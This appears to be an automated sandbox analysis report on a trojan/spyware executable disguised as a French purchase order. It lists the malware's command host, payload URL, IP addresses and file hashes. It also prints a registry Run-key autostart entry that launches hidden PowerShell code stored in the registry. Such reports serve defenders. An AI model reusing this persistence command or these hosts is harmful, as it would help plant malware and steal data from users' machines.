            http://geoplugin.net/json.gpe0%VirustotalBrowse
            http://geoplugin.net/json.gpP0%VirustotalBrowse
            learfo55ozj01.duckdns.org13%VirustotalBrowse
            https://ricohltd.top/20%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            learfo55ozj01.duckdns.org
            193.222.96.21
            truetrueunknown
            geoplugin.net
            178.237.33.50
            truefalseunknown
            ricohltd.top
            172.67.191.112
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            http://geoplugin.net/json.gptrue
            • URL Reputation: phishing
            unknown
            https://ricohltd.top/aCqwFQDQz144.binfalse
            • 18%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            learfo55ozj01.duckdns.orgtrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp | false | - | high
http://geoplugin.net/json.gpe | wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gprfo2 | wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ricohltd.top/aCqwFQDQz144.bin-_ | wab.exe, 00000007.00000002.3324148193.0000000009A19000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gpP | wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2921973326.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000000.2054692266.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp | false | - | high
http://geoplugin.net/json.gpen | wab.exe, 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2906191966.0000000004841000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2906191966.0000000004996000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ricohltd.top/- | wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ricohltd.top/ | wab.exe, 00000007.00000002.3324148193.0000000009A56000.00000004.00000020.00020000.00000000.sdmp | false | 20% (Virustotal); Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.191.112 | ricohltd.top | United States | 13335 | CLOUDFLARENETUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431988
Start date and time: 2024-04-26 07:42:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@57/41@4/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 87
• Number of non-executed functions: 27
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.189.173.20, 13.89.179.12
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6472 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:42:58 | API Interceptor | 43x Sleep call for process: powershell.exe modified
07:44:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Emraud %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)
07:44:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Emraud %Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)
07:44:36 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
07:44:56 | API Interceptor | 18x Sleep call for process: wab.exe modified
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5802359423370325
Encrypted: false
SSDEEP: 96:jNFmiaAKFjsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5c:h4iaAKFjk0WbkQzuiF6Z24IO8b
MD5: 74C263A3DE01DCCB0118F433A5FA9C16
SHA1: 1F0C2629E51CAB9B745BCA657E6ADA48137EC9C3
SHA-256: 226DDD324B8F92CDE8C59D68574A9FF2DA9F4620AA8146B730CCDE14725E1806
SHA-512: D4FBD09277DFAE5CF603423F8E031F68887221FFF8348D5868D4AB8C90867886A79D682AB00CA081A0575E77FF013F4FB997B447C435BED8A1F1186C7D9DA6E5
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5809832805575409
Encrypted: false
SSDEEP: 96:LGLFJxRAKhsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5c:Lg9RAKhk0WbkQzuiF6Z24IO8b
MD5: 868A3D4E6727702261699D50A1E24DF2
SHA1: 92B4FF6DA5897A90699EBF12DFC52EE773011417
SHA-256: C0CC186B1653D79E9E91A61DC44C14CF42D5A6126B6FDECE0D9AA663BA9BFA57
SHA-512: 95F37810A2639624B479E1088B1C405C2BB69B8ACE39B4B36BDC827919D19E1D7A3ADBAA204BE313DC250787B46DFFFBC84081123849721CB910814C2BCE1EBF
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5802071676463086
Encrypted: false
SSDEEP: 96:8ZFmCmQgAK9asQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXm:A4TAKIk0WbkQzuiF6Z24IO8b
MD5: 94DCA5EE1A269FD19D677220D6B8139B
SHA1: 8DAF2703C667A2C2FC706F7BED80B0CD5E1ED53A
SHA-256: 2774639B93C8754C9E9B8F321975C2815A03C0FB8D1E4EC893C413D112C30726
SHA-512: FC3F5AF79903C4955E8AAB312ACC5113D738374243AF5FA874CB9A916C8B03A66B1A46341DD8AA9C3DF67073E1ABE24CD57608B4DAB4902E087990622D005F6A
Malicious: false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.2.4.5.7.0.5.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.6.8.4.7.6.6.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.2.e.0.f.7.9.-.c.5.a.c.-.4.f.1.4.-.9.b.f.f.-.4.c.e.0.a.a.2.9.5.4.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.b.6.6.d.e.d.-.f.0.a.8.-.4.e.4.9.-.b.b.7.2.-.4.d.c.a.0.2.e.e.8.3.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.4.4.-.0.0.0.1.-.0.0.1.5.-.7.7.a.d.-.f.9.c.f.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5802867360135184
                                                      Encrypted:false
                                                      SSDEEP:96:aWF5AKUsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5NHBg:lzAKUk0WbkQzuiF6Z24IO8b
                                                      MD5:73F10D631DDCD570F4642973B7E8D593
                                                      SHA1:0F9CDCE06ED8E9E7103A1D7EE90E92FF05DD5B0D
                                                      SHA-256:D848BFCD097E1F486AE7802A275B3973F865AF931A0B477C5612B2D3EA09E81B
                                                      SHA-512:62D5DB105F334BA736D60C7FDA51E47BA98B8F32063C046D7333AE1DAFC4788E62310B86D592EE7B8741D5B0379F4E863238D16AEBD01CC999D9DA1BD0DB4CC2
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.6.7.2.5.5.9.3.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.1.8.6.5.3.2.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.1.7.f.0.7.a.-.b.2.5.6.-.4.4.7.d.-.a.7.3.e.-.2.c.f.2.d.7.5.2.8.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.4.8.8.2.c.7.-.e.c.9.4.-.4.1.3.c.-.9.a.0.0.-.f.c.2.6.6.f.8.d.7.7.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.1.8.-.0.0.0.1.-.0.0.1.5.-.0.e.9.8.-.c.f.c.c.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5803074487673112
                                                      Encrypted:false
                                                      SSDEEP:96:L7faFroDAKwsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXTy:LOBGAKwk0WbkQzuiF6Z24IO8b
                                                      MD5:C411F7717879A86E3A01B635F8586AD3
                                                      SHA1:B78F524713174F8AD875C648179AA3EF0A4B76FF
                                                      SHA-256:C0A98F11CAE07D56D3A53310F7A38FC4041C6806F18F0E94A7F7D7C4B72A3395
                                                      SHA-512:54652130DACA076D52B152EFE5A6BEA31357ACA9ACB4A19D6E107C0278D613445E41A9D7A8B8135A2F14536B1B2B8BEEF506906F71511DCB453A08CC8CD42E49
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.7.7.3.7.8.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.8.2.7.2.2.1.6.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.4.4.e.e.d.c.-.6.6.9.d.-.4.f.8.8.-.8.e.f.d.-.c.5.d.9.d.6.b.6.d.e.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.0.a.f.e.2.2.-.7.c.0.2.-.4.d.9.d.-.8.f.2.e.-.1.3.0.a.7.6.4.e.4.b.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.4.-.0.0.0.1.-.0.0.1.5.-.7.5.c.a.-.2.a.d.3.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.580501044130667
                                                      Encrypted:false
                                                      SSDEEP:96:5cFGAK8sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5NHBg:+8AK8k0WbkQzuiF6Z24IO8b
                                                      MD5:5C7EACDBE6E70C7F6ED823276C3162E7
                                                      SHA1:2EB5C0D155D419EB1FD94162657D8C996AAF9CD1
                                                      SHA-256:0507F59711498D62CF6EAF37768D6239A2844EE7D714801B00EC722140130148
                                                      SHA-512:B06E115EB386F455407930CA7B0036C251CA475AE49EC74CA94CD38833E894642CEC9114B808A25D8BF3BBBF6F7BD39D7EFD128998BFE49B9271B5FE945EDB2B
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.6.7.2.1.1.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.1.9.1.4.2.9.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.8.4.3.3.e.f.-.6.1.8.8.-.4.b.0.0.-.b.5.4.9.-.f.2.3.0.d.2.c.a.4.5.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.3.0.c.4.1.5.-.f.3.4.9.-.4.8.d.b.-.8.5.0.e.-.6.6.4.b.0.0.9.4.d.c.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.6.c.-.0.0.0.1.-.0.0.1.5.-.3.c.6.0.-.c.c.c.c.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.5806825811562569
                                                      Encrypted:false
                                                      SSDEEP:96:LhqFBAAK3sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAMf/VXT5Nm:LojAAK3k0WbkQzuiF6Z24IO8b
                                                      MD5:C1E89622183B8C7590A2AABDA888C231
                                                      SHA1:A14F8735FB13C1697AD715A529BDEA4C2B2882F3
                                                      SHA-256:5E96789A87C65B01AFD9931AE1170BF54A65F78F8C4722C15884DDB20C9FB4B3
                                                      SHA-512:E7021AAF5627A44FB88CEB96D2D3E1EA72784FA4A8836CE77CA1BC33294133E6B039BAE77D2164660875875B5D0DA8F2219044F9C8CC48CAEE7AF1FCB04823DE
                                                      Malicious:false
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.8.7.7.8.4.9.8.3.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.8.8.2.7.2.4.8.1.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.3.1.f.d.e.0.-.7.b.d.0.-.4.7.7.c.-.9.4.5.0.-.f.4.7.d.b.8.3.0.8.7.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.9.7.0.4.5.0.-.f.a.5.6.-.4.9.5.0.-.b.8.a.2.-.2.d.3.f.f.c.0.2.8.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.1.4.-.0.0.0.1.-.0.0.1.5.-.2.1.0.d.-.3.1.d.3.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.679181890075627
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJjk6g86YBF6sJAgmfUBpxt89b2Gsftym:R6lXJg6g86Yz6sOgmfUE2lfp
                                                      MD5:AF3A93CBB7CBC59F5BC9FEF294FCB831
                                                      SHA1:676F2A0658B6F160DBEC4C66B86645A9F47A28B8
                                                      SHA-256:1F96BCB1EA3E416973E7157861FECBEB54242FBEEF433B4D78DB0AE447B37B35
                                                      SHA-512:189B89DC6959CDEC0140D6369E520DB9B1EBF717A1CF67014E56881BDAB2A14049EFD59B7DD3178CC606ABC202055F76A391D61E089D6E9753B8FB4076C7E021
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.3.2.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430204088944599
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY6PYm8M4JTHFO+q876K27I3dBid:uIjfKI7Jx7VDSJoTk3dBid
                                                      MD5:514C106E266FF244AC8B7D2837C7C2CB
                                                      SHA1:B93A2836AD82016F53568715661DA9100B141562
                                                      SHA-256:6B5FD7A34744A444141BDA50F47EF902D798E49CC879349559A89A39EAFE0594
                                                      SHA-512:E4BD4BB36B19592749303BD131C39A155E907BDF55B66180A532734C72793309657B000AE23AEFCC21A3E48B92FBDA95F49E5EE2C5E50D84935C9D0CFE5FFD82
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8250
                                                      Entropy (8bit):3.6803364399963074
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJRZ6Ha56YBg6sJAgmfUBpx089bN5sfiPm:R6lXJP6HU6YW6sOgmfUfNSfz
                                                      MD5:78DDB095C3EDEE0A745BD77221FAC14F
                                                      SHA1:A2D97BC56E47F45740CF55DCC2E233F97500EDF2
                                                      SHA-256:CCE2A3BECC529382B49A000F6DE7BBAFD028310707A7B83DA51D3FD51DBC4D36
                                                      SHA-512:52CD44EF4308568669401F2648BD992E73ECD2ABBE8D7198E1E3EB02410C8A1A9588CC7289EDB671F410841599879E79E06E19AD56171CF90101CE2B4D34819E
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 